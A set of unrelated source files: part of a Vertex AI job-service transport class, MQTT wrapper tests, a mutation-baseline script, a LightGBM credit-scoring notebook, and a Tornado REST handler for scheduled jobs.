client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file, scopes=scopes, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(
scopes=scopes, quota_project_id=quota_project_id
)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_custom_job: gapic_v1.method.wrap_method(
self.create_custom_job, default_timeout=None, client_info=client_info,
),
self.get_custom_job: gapic_v1.method.wrap_method(
self.get_custom_job, default_timeout=None, client_info=client_info,
),
self.list_custom_jobs: gapic_v1.method.wrap_method(
self.list_custom_jobs, default_timeout=None, client_info=client_info,
),
self.delete_custom_job: gapic_v1.method.wrap_method(
self.delete_custom_job, default_timeout=None, client_info=client_info,
),
self.cancel_custom_job: gapic_v1.method.wrap_method(
self.cancel_custom_job, default_timeout=None, client_info=client_info,
),
self.create_data_labeling_job: gapic_v1.method.wrap_method(
self.create_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.get_data_labeling_job: gapic_v1.method.wrap_method(
self.get_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.list_data_labeling_jobs: gapic_v1.method.wrap_method(
self.list_data_labeling_jobs,
default_timeout=None,
client_info=client_info,
),
self.delete_data_labeling_job: gapic_v1.method.wrap_method(
self.delete_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.cancel_data_labeling_job: gapic_v1.method.wrap_method(
self.cancel_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.create_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.create_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.get_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.get_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.list_hyperparameter_tuning_jobs: gapic_v1.method.wrap_method(
self.list_hyperparameter_tuning_jobs,
default_timeout=None,
client_info=client_info,
),
self.delete_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.delete_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.cancel_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.cancel_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.create_batch_prediction_job: gapic_v1.method.wrap_method(
self.create_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
self.get_batch_prediction_job: gapic_v1.method.wrap_method(
self.get_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
self.list_batch_prediction_jobs: gapic_v1.method.wrap_method(
self.list_batch_prediction_jobs,
default_timeout=None,
client_info=client_info,
),
self.delete_batch_prediction_job: gapic_v1.method.wrap_method(
self.delete_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
self.cancel_batch_prediction_job: gapic_v1.method.wrap_method(
self.cancel_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def create_custom_job(
self,
) -> typing.Callable[
[job_service.CreateCustomJobRequest],
typing.Union[
gca_custom_job.CustomJob, typing.Awaitable[gca_custom_job.CustomJob]
],
]:
raise NotImplementedError()
@property
def get_custom_job(
self,
) -> typing.Callable[
[job_service.GetCustomJobRequest],
typing.Union[custom_job.CustomJob, typing.Awaitable[custom_job.CustomJob]],
]:
raise NotImplementedError()
@property
def list_custom_jobs(
self,
) -> typing.Callable[
[job_service.ListCustomJobsRequest],
typing.Union[
job_service.ListCustomJobsResponse,
typing.Awaitable[job_service.ListCustomJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_custom_job(
self,
) -> typing.Callable[
[job_service.DeleteCustomJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_custom_job(
self,
) -> typing.Callable[
[job_service.CancelCustomJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
@property
def create_data_labeling_job(
self,
) -> typing.Callable[
[job_service.CreateDataLabelingJobRequest],
typing.Union[
gca_data_labeling_job.DataLabelingJob,
typing.Awaitable[gca_data_labeling_job.DataLabelingJob],
],
]:
raise NotImplementedError()
@property
def get_data_labeling_job(
self,
) -> typing.Callable[
[job_service.GetDataLabelingJobRequest],
typing.Union[
data_labeling_job.DataLabelingJob,
typing.Awaitable[data_labeling_job.DataLabelingJob],
],
]:
raise NotImplementedError()
@property
def list_data_labeling_jobs(
self,
) -> typing.Callable[
[job_service.ListDataLabelingJobsRequest],
typing.Union[
job_service.ListDataLabelingJobsResponse,
typing.Awaitable[job_service.ListDataLabelingJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_data_labeling_job(
self,
) -> typing.Callable[
[job_service.DeleteDataLabelingJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_data_labeling_job(
self,
) -> typing.Callable[
[job_service.CancelDataLabelingJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
@property
def create_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.CreateHyperparameterTuningJobRequest],
typing.Union[
gca_hyperparameter_tuning_job.HyperparameterTuningJob,
typing.Awaitable[gca_hyperparameter_tuning_job.HyperparameterTuningJob],
],
]:
raise NotImplementedError()
@property
def get_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.GetHyperparameterTuningJobRequest],
typing.Union[
hyperparameter_tuning_job.HyperparameterTuningJob,
typing.Awaitable[hyperparameter_tuning_job.HyperparameterTuningJob],
],
]:
raise NotImplementedError()
@property
def list_hyperparameter_tuning_jobs(
self,
) -> typing.Callable[
[job_service.ListHyperparameterTuningJobsRequest],
typing.Union[
job_service.ListHyperparameterTuningJobsResponse,
typing.Awaitable[job_service.ListHyperparameterTuningJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.DeleteHyperparameterTuningJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.CancelHyperparameterTuningJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
@property
def create_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.CreateBatchPredictionJobRequest],
typing.Union[
gca_batch_prediction_job.BatchPredictionJob,
typing.Awaitable[gca_batch_prediction_job.BatchPredictionJob],
],
]:
raise NotImplementedError()
@property
def get_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.GetBatchPredictionJobRequest],
typing.Union[
batch_prediction_job.BatchPredictionJob,
typing.Awaitable[batch_prediction_job.BatchPredictionJob],
],
]:
raise NotImplementedError()
@property
def list_batch_prediction_jobs(
self,
) -> typing.Callable[
[job_service.ListBatchPredictionJobsRequest],
typing.Union[
job_service.ListBatchPredictionJobsResponse,
typing.Awaitable[job_service.ListBatchPredictionJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.DeleteBatchPredictionJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.CancelBatchPredictionJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
__all__ = ("JobServiceTransport",)
|
the-stack_106_14835
|
"""Test the MQTT Wrapper class."""
import asyncio
from typing import Match
import gmqtt
import pytest
from pydantic import BaseModel
from automation_engine.config import MQTTBrokerInfo
from automation_engine.mqtt.topic import Topic
from automation_engine.mqtt.wrapper import MQTTWrapper
BROKER_INFO = MQTTBrokerInfo(
host="localhost",
port=1883,
)
class StubModel(BaseModel):
"""Test BaseModel."""
foo: str
async def stub_message_handler(
match: Match[str],
payload: str,
) -> None:
"""Used in tests as a stub with the right type."""
pass
def test_wrapper_init_minimal() -> None:
"""Test initialising the wrapper with minimal options."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert wr._client_name == "foo"
assert wr._last_will is None
assert len(wr._topic_handlers) == 0
assert wr._client._client_id == "foo"
def test_wrapper_is_connected_at_init() -> None:
"""Test that the wrapper is not connected to the broker at init."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert not wr.is_connected
def test_wrapper_last_will_message_null() -> None:
"""Test that the last will message is None when not supplied."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert wr.last_will_message is None
def test_wrapper_mqtt_prefix() -> None:
"""Test that the MQTT prefix is as expected."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert wr.mqtt_prefix == "automation-engine"
def test_subscribe() -> None:
"""Test that subscribing works as expected."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert len(wr._topic_handlers) == 0
wr.subscribe("bees/+", stub_message_handler)
assert len(wr._topic_handlers) == 1
assert wr._topic_handlers[
Topic(["automation-engine", "bees", "+"])
] == stub_message_handler
@pytest.mark.filterwarnings("ignore")
@pytest.mark.asyncio
async def test_connect_disconnect() -> None:
"""Test that the wrapper can connect and disconnect from the broker."""
wr = MQTTWrapper("foo", BROKER_INFO)
await wr.connect()
assert wr.is_connected
await wr.disconnect()
assert not wr.is_connected
@pytest.mark.asyncio
async def test_handler_called() -> None:
"""Test that subscription handlers are called correctly."""
ev = asyncio.Event()
async def test_handler(
match: Match[str],
payload: str,
) -> None:
assert payload == "hive"
ev.set()
wr = MQTTWrapper("foo", BROKER_INFO)
wr.subscribe("bees/+", test_handler)
await wr.connect()
# Manually call on_message
res = await wr.on_message(
wr._client,
"automation-engine/bees/bar",
b"hive",
0,
{},
)
assert res == gmqtt.constants.PubRecReasonCode.SUCCESS
await asyncio.wait_for(ev.wait(), 0.1)
await wr.disconnect()
@pytest.mark.asyncio
async def test_publish_send_and_receive() -> None:
"""Test that we can publish and receive a message."""
ev = asyncio.Event()
async def test_handler(
match: Match[str],
payload: str,
) -> None:
ev.set()
wr_sub = MQTTWrapper("foo", BROKER_INFO)
wr_pub = MQTTWrapper("bar", BROKER_INFO)
wr_sub.subscribe("bees/+", test_handler)
await wr_sub.connect()
await wr_pub.connect()
wr_pub.publish("bees/foo", StubModel(foo="bar"))
await asyncio.wait_for(ev.wait(), 0.5)
await wr_sub.disconnect()
await wr_pub.disconnect()
@pytest.mark.asyncio
async def test_publish_send_and_receive_on_self() -> None:
"""Test that we can publish and receive a message on it's own topic."""
ev = asyncio.Event()
async def test_handler(
match: Match[str],
payload: str,
) -> None:
ev.set()
wr_sub = MQTTWrapper("foo", BROKER_INFO)
wr_pub = MQTTWrapper("bar", BROKER_INFO)
wr_sub.subscribe("", test_handler)
await wr_sub.connect()
await wr_pub.connect()
wr_pub.publish("", StubModel(foo="bar"))
await asyncio.wait_for(ev.wait(), 0.5)
await wr_sub.disconnect()
await wr_pub.disconnect()
@pytest.mark.asyncio
async def test_publish_bad_topic_error() -> None:
"""Test that we cannot publish to an invalid topic."""
wr_pub = MQTTWrapper("bar", BROKER_INFO)
await wr_pub.connect()
with pytest.raises(ValueError):
wr_pub.publish("bees/+", StubModel(foo="bar"))
with pytest.raises(ValueError):
wr_pub.publish("bees/#", StubModel(foo="bar"))
with pytest.raises(ValueError):
wr_pub.publish("bees/", StubModel(foo="bar"))
await wr_pub.disconnect()
|
the-stack_106_14837
|
import argparse
import numpy as np
import pickle
import mutstat
import util  # assumed sibling module providing make_membership_mat (used below)
def main():
parser = argparse.ArgumentParser(
description='LOL HI THERE',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('sim_data_fn')
parser.add_argument('baseline_mutdist_fn')
args = parser.parse_args()
with open(args.sim_data_fn, 'rb') as dataf:
simdata = pickle.load(dataf)
clusters = [[]] + simdata['clusters']
vids, membership = util.make_membership_mat(clusters)
mphi = np.dot(membership, simdata['phi'])
baseline = mutstat.Mutstat(stats=mphi, vids=vids, assays=simdata['sampnames'])
mutstat.write(baseline, args.baseline_mutdist_fn)
if __name__ == '__main__':
main()
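# Hedged example invocation (script and file names here are illustrative only):
#   python make_baseline.py results/sim_data.pickle results/baseline_mutdist.npz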
|
the-stack_106_14841
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import pandas as pd
import numpy as np
# In[229]:
df = pd.read_csv('D:/Titip/german_credit.csv')
# In[230]:
df['account_check_status'] = df['account_check_status'].str.strip().map({'no checking account' : 'no',
'< 0 DM' : 'negative',
'0 <= ... < 200 DM' : 'low',
'>= 200 DM / salary assignments for at least 1 year' : 'high'})
df['credit_history'] = df['credit_history'].str.strip().map({'existing credits paid back duly till now' : 'A',
'critical account/ other credits existing (not at this bank)' : 'B',
'delay in paying off in the past' : 'C',
'all credits at this bank paid back duly' : 'D',
'no credits taken/ all credits paid back duly' : 'E'})
df['purpose'] = df['purpose'].str.strip().map({'domestic appliances' : 'domestic',
'car (new)' : 'new_car',
'radio/television' : 'radtel',
'car (used)' : 'used_car',
'(vacation - does not exist?)' : 'vacation',
'furniture/equipment' : 'furniture',
'business' : 'business',
'education' : 'education',
'repairs' : 'repairs',
'retraining' : 'retraining'})
df['savings'] = df['savings'].str.strip().map({'... < 100 DM' : 'low',
'unknown/ no savings account' : 'no',
'100 <= ... < 500 DM' : 'medium',
'500 <= ... < 1000 DM' : 'high',
'.. >= 1000 DM' : 'very_high'})
df['present_emp_since'] = df['present_emp_since'].str.strip().map({'... < 1 year' : 'very short',
'1 <= ... < 4 years' : 'short',
'4 <= ... < 7 years' : 'long',
'.. >= 7 years' : 'very_long',
'unemployed' : 'unemployed'})
df['personal_status_sex'] = df['personal_status_sex'].str.strip().map({'male : single' : 'single_male',
'female : divorced/separated/married' : 'female',
'male : married/widowed' : 'mw_male',
'male : divorced/separated' : 'ds_male'})
df['other_debtors'] = df['other_debtors'].str.strip().map({'co-applicant' : 'co_applicant',
'none' : 'none',
'guarantor' : 'guarantor'})
df['property'] = df['property'].str.strip().map({'if not A121/A122 : car or other, not in attribute 6' : 'car',
'real estate' : 'real_estate',
'if not A121 : building society savings agreement/ life insurance' : 'building',
'unknown / no property' : 'unknown'})
df['other_installment_plans'] = df['other_installment_plans'].str.strip()
df['housing'] = df['housing'].str.strip().map({'for free' : 'free',
'own' : 'own',
'rent' : 'rent'})
df['job'] = df['job'].str.strip().map({'skilled employee / official' : 'skilled',
'unskilled - resident' : 'unskilled_res',
'management/ self-employed/ highly qualified employee/ officer' : 'manager',
'unemployed/ unskilled - non-resident' : 'unskilled_nores'})
df['telephone'] = df['telephone'].str.strip().map({'yes, registered under the customers name' : 'registered',
'none' : 'none'})
del df['job']
# In[231]:
from sklearn.model_selection import train_test_split
X = df.copy()
del X['default']
y = df['default']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 42)
X_train = pd.get_dummies(X_train)
X_test = pd.get_dummies(X_test)
# In[232]:
for i in X_train.columns :
X_train[i] = X_train[i].astype(int)
# In[233]:
for i in X_test.columns :
X_test[i] = X_test[i].astype(int)
# In[234]:
import lightgbm
train_data = lightgbm.Dataset(X_train, label = y_train)
test_data = lightgbm.Dataset(X_test, label = y_test)
parameters_lgb = {
'application': 'binary',
'objective': 'binary',
'metric': 'auc',
'is_unbalance': 'true',
'boosting': 'gbdt',
'num_leaves': 31,
'feature_fraction': 0.5,
'bagging_fraction': 0.5,
'bagging_freq': 20,
'learning_rate': 0.05,
'verbose': 0
}
model = lightgbm.train(params=parameters_lgb,
train_set= train_data,
valid_sets=test_data,
num_boost_round=5000,
early_stopping_rounds=100)
# In[192]:
df2 = df.copy()
# In[193]:
df2 = pd.get_dummies(df2)
# In[194]:
from bayes_opt import BayesianOptimization
from sklearn.metrics import precision_score, recall_score, confusion_matrix, accuracy_score, roc_auc_score, f1_score, roc_curve, auc,precision_recall_curve
import lightgbm as lgb
# In[195]:
bayesian_tr_idx = X_train.index
bayesian_val_idx = X_test.index
# In[197]:
bounds_LGB = {
'num_leaves': (31, 500),
'min_data_in_leaf': (20, 200),
'bagging_fraction' : (0.1, 0.9),
'feature_fraction' : (0.1, 0.9),
'learning_rate': (0.01, 0.3),
'min_child_weight': (0.00001, 0.01),
'reg_alpha': (1, 2),
'reg_lambda': (1, 2),
'max_depth':(-1,50),
}
# In[198]:
def LGB_bayesian(
learning_rate,
num_leaves,
bagging_fraction,
feature_fraction,
min_child_weight,
min_data_in_leaf,
max_depth,
reg_alpha,
reg_lambda
):
# LightGBM expects next three parameters need to be integer.
num_leaves = int(num_leaves)
min_data_in_leaf = int(min_data_in_leaf)
max_depth = int(max_depth)
assert type(num_leaves) == int
assert type(min_data_in_leaf) == int
assert type(max_depth) == int
param = {
'num_leaves': num_leaves,
'min_data_in_leaf': min_data_in_leaf,
'min_child_weight': min_child_weight,
'bagging_fraction' : bagging_fraction,
'feature_fraction' : feature_fraction,
'learning_rate' : learning_rate,
'max_depth': max_depth,
'reg_alpha': reg_alpha,
'reg_lambda': reg_lambda,
'objective': 'binary',
'save_binary': True,
'seed': 1337,
'feature_fraction_seed': 1337,
'bagging_seed': 1337,
'drop_seed': 1337,
'data_random_seed': 1337,
'boosting_type': 'gbdt',
'verbose': 1,
'is_unbalance': False,
'boost_from_average': True,
'metric':'auc'}
oof = np.zeros(len(df2))
trn_data= lgb.Dataset(df2.iloc[bayesian_tr_idx][features].values, label=df2.iloc[bayesian_tr_idx][target].values)
val_data= lgb.Dataset(df2.iloc[bayesian_val_idx][features].values, label=df2.iloc[bayesian_val_idx][target].values)
clf = lgb.train(param, trn_data, num_boost_round=50, valid_sets = [trn_data, val_data], verbose_eval=0, early_stopping_rounds = 50)
oof[bayesian_val_idx] = clf.predict(df2.iloc[bayesian_val_idx][features].values, num_iteration=clf.best_iteration)
score = roc_auc_score(df2.iloc[bayesian_val_idx][target].values, oof[bayesian_val_idx])
return score
# In[199]:
LGB_BO = BayesianOptimization(LGB_bayesian, bounds_LGB, random_state=0)
# In[200]:
init_points = 10
n_iter = 15
# In[202]:
import warnings
warnings.filterwarnings("ignore")
features = list(df2)
features.remove('default')
target = 'default'
print('-' * 130)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
LGB_BO.maximize(init_points=init_points, n_iter=n_iter, acq='ucb', xi=0.0, alpha=1e-6)
# In[203]:
param_lgb = {
'min_data_in_leaf': int(LGB_BO.max['params']['min_data_in_leaf']),
'num_leaves': int(LGB_BO.max['params']['num_leaves']),
'learning_rate': LGB_BO.max['params']['learning_rate'],
'min_child_weight': LGB_BO.max['params']['min_child_weight'],
'bagging_fraction': LGB_BO.max['params']['bagging_fraction'],
'feature_fraction': LGB_BO.max['params']['feature_fraction'],
'reg_lambda': LGB_BO.max['params']['reg_lambda'],
'reg_alpha': LGB_BO.max['params']['reg_alpha'],
'max_depth': int(LGB_BO.max['params']['max_depth']),
'objective': 'binary',
'save_binary': True,
'seed': 1337,
'feature_fraction_seed': 1337,
'bagging_seed': 1337,
'drop_seed': 1337,
'data_random_seed': 1337,
'boosting_type': 'gbdt',
'verbose': 1,
'is_unbalance': False,
'boost_from_average': True,
'metric':'auc'
}
# In[205]:
import matplotlib.pyplot as plt
def plot_confusion_matrix(cm, classes,
normalize = False,
title = 'Confusion matrix"',
cmap = plt.cm.Blues) :
plt.imshow(cm, interpolation = 'nearest', cmap = cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation = 0)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])) :
plt.text(j, i, cm[i, j],
horizontalalignment = 'center',
color = 'white' if cm[i, j] > thresh else 'black')
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# In[208]:
from sklearn.model_selection import StratifiedKFold,KFold
from sklearn.metrics import precision_score, recall_score, confusion_matrix, accuracy_score, roc_auc_score, f1_score, roc_curve, auc,precision_recall_curve
import itertools
plt.rcParams["axes.grid"] = True
nfold = 5
skf = StratifiedKFold(n_splits=nfold, shuffle=True, random_state=42)
oof = np.zeros(len(df2))
mean_fpr = np.linspace(0,1,100)
cms= []
tprs = []
aucs = []
y_real = []
y_proba = []
recalls = []
roc_aucs = []
f1_scores = []
accuracies = []
precisions = []
predictions = np.zeros(len(X_test))
feature_importance_df2 = pd.DataFrame()
i = 1
for train_idx, valid_idx in skf.split(df2, df2['default'].values):
print("\nfold {}".format(i))
trn_data = lgb.Dataset(df2.iloc[train_idx][features].values,
label=df2.iloc[train_idx][target].values
)
val_data = lgb.Dataset(df2.iloc[valid_idx][features].values,
label=df2.iloc[valid_idx][target].values
)
clf = lgb.train(param_lgb, trn_data, num_boost_round = 500, valid_sets = [trn_data, val_data], verbose_eval = 100, early_stopping_rounds = 100)
oof[valid_idx] = clf.predict(df2.iloc[valid_idx][features].values)
predictions += clf.predict(X_test[features]) / nfold
# Scores
roc_aucs.append(roc_auc_score(df2.iloc[valid_idx][target].values, oof[valid_idx]))
accuracies.append(accuracy_score(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
recalls.append(recall_score(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
precisions.append(precision_score(df2.iloc[valid_idx][target].values ,oof[valid_idx].round()))
f1_scores.append(f1_score(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
# Roc curve by folds
f = plt.figure(1)
fpr, tpr, t = roc_curve(df2.iloc[valid_idx][target].values, oof[valid_idx])
    tprs.append(np.interp(mean_fpr, fpr, tpr))
roc_auc = auc(fpr, tpr)
aucs.append(roc_auc)
plt.plot(fpr, tpr, lw=2, alpha=0.3, label='ROC fold %d (AUC = %0.4f)' % (i,roc_auc))
# Precion recall by folds
g = plt.figure(2)
precision, recall, _ = precision_recall_curve(df2.iloc[valid_idx][target].values, oof[valid_idx])
y_real.append(df2.iloc[valid_idx][target].values)
y_proba.append(oof[valid_idx])
plt.plot(recall, precision, lw=2, alpha=0.3, label='P|R fold %d' % (i))
i= i+1
# Confusion matrix by folds
cms.append(confusion_matrix(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
# Features imp
fold_importance_df2 = pd.DataFrame()
fold_importance_df2["Feature"] = features
fold_importance_df2["importance"] = clf.feature_importance()
fold_importance_df2["fold"] = nfold + 1
feature_importance_df2 = pd.concat([feature_importance_df2, fold_importance_df2], axis=0)
# Metrics
print(
'\nCV roc score : {0:.4f}, std: {1:.4f}.'.format(np.mean(roc_aucs), np.std(roc_aucs)),
'\nCV accuracy score : {0:.4f}, std: {1:.4f}.'.format(np.mean(accuracies), np.std(accuracies)),
'\nCV recall score : {0:.4f}, std: {1:.4f}.'.format(np.mean(recalls), np.std(recalls)),
'\nCV precision score : {0:.4f}, std: {1:.4f}.'.format(np.mean(precisions), np.std(precisions)),
'\nCV f1 score : {0:.4f}, std: {1:.4f}.'.format(np.mean(f1_scores), np.std(f1_scores))
)
#ROC
f = plt.figure(1)
plt.plot([0,1],[0,1],linestyle = '--',lw = 2,color = 'grey')
mean_tpr = np.mean(tprs, axis=0)
mean_auc = auc(mean_fpr, mean_tpr)
plt.plot(mean_fpr, mean_tpr, color='blue',
label=r'Mean ROC (AUC = %0.4f)' % (np.mean(roc_aucs)),lw=2, alpha=1)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('LGB ROC curve by folds')
plt.legend(loc="lower right")
# PR plt
g = plt.figure(2)
plt.plot([0,1],[1,0],linestyle = '--',lw = 2,color = 'grey')
y_real = np.concatenate(y_real)
y_proba = np.concatenate(y_proba)
precision, recall, _ = precision_recall_curve(y_real, y_proba)
plt.plot(recall, precision, color='blue',
label=r'Mean P|R')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('P|R curve by folds')
plt.legend(loc="lower left")
# Confusion maxtrix & metrics
plt.rcParams["axes.grid"] = False
cm = np.average(cms, axis=0)
default_names = [0,1]
plt.figure()
plot_confusion_matrix(cm,
classes=default_names,
title= 'LGB Confusion matrix [averaged/folds]')
plt.show()
# In[209]:
LGB_BO.max['params']
|
the-stack_106_14843
|
"""Handler for jobs endpoint."""
import json
import tornado.concurrent
import tornado.gen
import tornado.web
from ... import constants
from ... import utils
from . import base
class Handler(base.BaseHandler):
def _get_jobs(self):
"""Returns a dictionary for all jobs info.
It's a blocking operation.
"""
jobs = self.scheduler_manager.get_jobs()
return_json = []
for job in jobs:
return_json.append(self._build_job_dict(job))
return {'jobs': return_json}
def _build_job_dict(self, job):
"""Transforms apscheduler's job structure to a python dictionary.
:param Job job: An apscheduler.job.Job instance.
:return: dictionary for job info
:rtype: dict
"""
if job.next_run_time:
next_run_time = job.next_run_time.isoformat()
else:
next_run_time = ''
return_dict = {
'job_id': job.id,
'name': job.name,
'next_run_time': next_run_time,
'job_class_string': utils.get_job_name(job),
'pub_args': utils.get_job_args(job)}
return_dict.update(utils.get_cron_strings(job))
return return_dict
@tornado.concurrent.run_on_executor
def get_jobs(self):
"""Wrapper to run _get_jobs() on a thread executor.
:return: dictionary for jobs
A dictionary of jobs, e.g., :
{
jobs: [...]
}
:rtype: dict
"""
return self._get_jobs()
@tornado.gen.engine
def get_jobs_yield(self):
"""Wrapper for get_jobs in async mode."""
return_json = yield self.get_jobs()
self.finish(return_json)
def _get_job(self, job_id):
"""Returns a dictionary for a job info.
It's a blocking operation.
:param str job_id: Job id.
:return: dictionary for a job
:rtype: dict
"""
job = self.scheduler_manager.get_job(job_id)
if not job:
self.set_status(400)
return {'error': 'Job not found: %s' % job_id}
return self._build_job_dict(job)
@tornado.concurrent.run_on_executor
def get_job(self, job_id):
"""Wrapper to run _get_jobs() on a thread executor.
:param str job_id: Job id.
:return: A dictionary of a job.
:rtype: dict
"""
return self._get_job(job_id)
@tornado.gen.engine
def get_job_yield(self, job_id):
"""Wrapper for get_job() to run in async mode.
:param str job_id: Job id.
"""
return_json = yield self.get_job(job_id)
self.finish(return_json)
@tornado.web.removeslash
@tornado.web.asynchronous
@tornado.gen.engine
def get(self, job_id=None):
"""Returns a job or multiple jobs.
Handles two endpoints:
GET /api/v1/jobs (when job_id == None)
GET /api/v1/jobs/{job_id} (when job_id != None)
:param str job_id: String for job id.
"""
if job_id is None:
self.get_jobs_yield()
else:
self.get_job_yield(job_id)
@tornado.web.removeslash
def post(self):
"""Adds a job.
add_job() is a non-blocking operation, but audit log is a blocking operation.
Handles an endpoint:
POST /api/v1/jobs
"""
self._validate_post_data()
# This is non-blocking function.
# It returns job_id immediately.
job_id = self.scheduler_manager.add_job(**self.json_args)
# Blocking operation.
self.datastore.add_audit_log(job_id, self.json_args['name'],
constants.AUDIT_LOG_ADDED, self.username)
response = {
'job_id': job_id}
self.set_status(201)
self.write(response)
def _delete_job(self, job_id):
"""Deletes a job.
It's a blocking operation.
:param str job_id: String for a job id.
"""
job = self._get_job(job_id)
self.scheduler_manager.remove_job(job_id)
self.datastore.add_audit_log(job_id, job['name'], constants.AUDIT_LOG_DELETED,
self.username, json.dumps(job))
@tornado.concurrent.run_on_executor
def delete_job(self, job_id):
"""Wrapper for _delete_job() to run on a threaded executor."""
self._delete_job(job_id)
@tornado.gen.engine
def delete_job_yield(self, job_id):
yield self.delete_job(job_id)
@tornado.web.removeslash
@tornado.web.asynchronous
@tornado.gen.engine
def delete(self, job_id):
"""Deletes a job.
Handles an endpoint:
DELETE /api/v1/jobs/{job_id}
:param str job_id: Job id
"""
self.delete_job_yield(job_id)
response = {
'job_id': job_id}
self.set_status(200)
self.finish(response)
def _generate_description_for_item(self, old_job, new_job, item):
"""Returns a diff for one field of a job.
:param dict old_job: Dict for old job.
:param dict new_job: Dict for new job after modification.
:return: String for description.
:rtype: str
"""
if old_job[item] != new_job[item]:
return ('<b>%s</b>: <font color="red">%s</font> =>'
' <font color="green">%s</font><br>') % (item, old_job[item], new_job[item])
return ''
def _generate_description_for_modify(self, old_job, new_job):
"""Generates description text after modifying a job.
:param dict old_job: Dict for old job.
:param dict new_job: Dict for new job after modification.
:return: String for description.
:rtype: str
"""
description = ''
items = [
'name',
'job_class_string',
'pub_args',
'minute',
'hour',
'day',
'month',
'day_of_week'
]
for item in items:
description += self._generate_description_for_item(old_job, new_job, item)
return description
def _modify_job(self, job_id):
"""Modifies a job's info.
This is a blocking operation.
:param str job_id: String for a job id.
"""
old_job = self._get_job(job_id)
self.scheduler_manager.modify_job(job_id, **self.json_args)
job = self._get_job(job_id)
# Audit log
self.datastore.add_audit_log(
job_id, job['name'], constants.AUDIT_LOG_MODIFIED,
self.username, self._generate_description_for_modify(old_job, job))
@tornado.concurrent.run_on_executor
def modify_job(self, job_id):
"""Wrapper for _modify_job() to run on threaded executor.
:param str job_id: String for a job id.
"""
self._modify_job(job_id)
@tornado.gen.engine
def modify_job_yield(self, job_id):
"""Wrapper for modify_job() to run in async mode.
:param str job_id: Job id.
"""
yield self.modify_job(job_id)
@tornado.web.removeslash
@tornado.web.asynchronous
@tornado.gen.engine
def put(self, job_id):
"""Modifies a job.
Handles an endpoint:
PUT /api/v1/jobs/{job_id}
:param str job_id: Job id.
"""
self._validate_post_data()
self.modify_job_yield(job_id)
response = {
'job_id': job_id}
